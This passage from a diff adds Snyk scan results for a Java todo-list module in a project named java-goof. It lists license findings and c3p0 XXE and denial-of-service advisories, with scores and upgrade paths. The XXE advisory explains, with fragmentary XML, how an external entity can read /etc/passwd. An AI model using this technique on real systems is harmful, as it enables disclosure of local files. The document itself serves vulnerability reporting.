"org.aspectj:aspectjweaver", + "version": "1.8.2" + }, + { + "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[4.0.0.CR1,)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.hibernate.common:hibernate-commons-annotations", + "creationTime": "2024-06-18T11:03:46.980Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:03:46.980Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" + ], + "upgradePath": [], + 
"isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate.common:hibernate-commons-annotations", + "version": "4.0.5.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.0.0.Final,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "creationTime": "2024-06-18T12:03:42.953Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T12:03:42.953Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "version": "1.0.0.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.5.0.Beta-1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-entitymanager", + "creationTime": "2024-06-18T11:52:01.913Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:52:01.913Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-entitymanager@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-entitymanager", + "version": "4.3.7.Final" + } + ], + "ok": false, + "dependencyCount": 34, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known 
vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "22 vulnerable dependency paths", + "remediation": { + "unresolved": [ + { + "id": "SNYK-JAVA-C3P0-461017", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:45.369849Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "description": "## 
Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", + "epssDetails": { + "percentile": "0.78365", + "probability": "0.00585", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-20433" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:17:58.383761Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-12-24T13:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-07-21T14:22:18Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:09.230623Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "critical" + }, + { + "id": "SNYK-JAVA-C3P0-461018", + "title": "Denial 
of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "description": "## 
Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": "license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + "packageManager": "maven", + 
"publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.3.0.CR1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-core", + "creationTime": "2024-06-18T19:09:16.096Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T19:09:16.096Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.5.4,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.aspectj:aspectjweaver", + "creationTime": "2024-06-18T21:24:04.112Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T21:24:04.112Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.aspectj:aspectjweaver@1.8.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.aspectj:aspectjweaver", + "version": "1.8.2", + "severityWithCritical": "medium" + }, + { + "id": 
"snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[4.0.0.CR1,)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.hibernate.common:hibernate-commons-annotations", + "creationTime": "2024-06-18T11:03:46.980Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:03:46.980Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate.common:hibernate-commons-annotations", + "version": "4.0.5.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.0.0.Final,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "creationTime": "2024-06-18T12:03:42.953Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T12:03:42.953Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "version": "1.0.0.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { 
+ "vulnerable": [ + "[3.5.0.Beta-1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-entitymanager", + "creationTime": "2024-06-18T11:52:01.913Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:52:01.913Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-entitymanager@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-entitymanager", + "version": "4.3.7.Final", + "severityWithCritical": "medium" + } + ], + "upgrade": { + "org.hibernate:hibernate-core@4.3.7.Final": { + "upgradeTo": "org.hibernate:hibernate-core@5.4.24.Final", + "upgrades": [ + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1", + "dom4j:dom4j@1.6.1" + ], + "vulns": [ + "SNYK-JAVA-ORGHIBERNATE-1041788", + "SNYK-JAVA-ORGHIBERNATE-584563", + "SNYK-JAVA-DOM4J-174153", + "SNYK-JAVA-DOM4J-2812975" + ] + }, + "org.hsqldb:hsqldb@2.3.2": { + "upgradeTo": "org.hsqldb:hsqldb@2.7.1", + "upgrades": [ + "org.hsqldb:hsqldb@2.3.2" + ], + "vulns": [ + "SNYK-JAVA-ORGHSQLDB-3040860" + ] + }, + "org.springframework:spring-context@3.2.6.RELEASE": { + "upgradeTo": "org.springframework:spring-context@5.2.24.RELEASE", + "upgrades": [ + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "vulns": [ + "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + 
"SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325" + ] + } + }, + "patch": {}, + "ignore": {}, + "pin": {} + }, + "filesystemPolicy": false, + "filtered": { + "ignore": [], + "patch": [] + }, + "uniqueCount": 22, + "projectName": "io.github.snyk:todolist-core", + "foundProjectCount": 7, + "displayTargetFile": "todolist-goof/todolist-core/pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + }, + { + "vulnerabilities": [ + { + "id": "SNYK-JAVA-C3P0-461017", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": 
"2024-03-11T09:48:09.230623Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:45.369849Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", + "epssDetails": { + "percentile": "0.78365", + "probability": "0.00585", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-20433" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:17:58.383761Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-12-24T13:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + 
"packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-07-21T14:22:18Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:09.230623Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "SNYK-JAVA-C3P0-461018", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": 
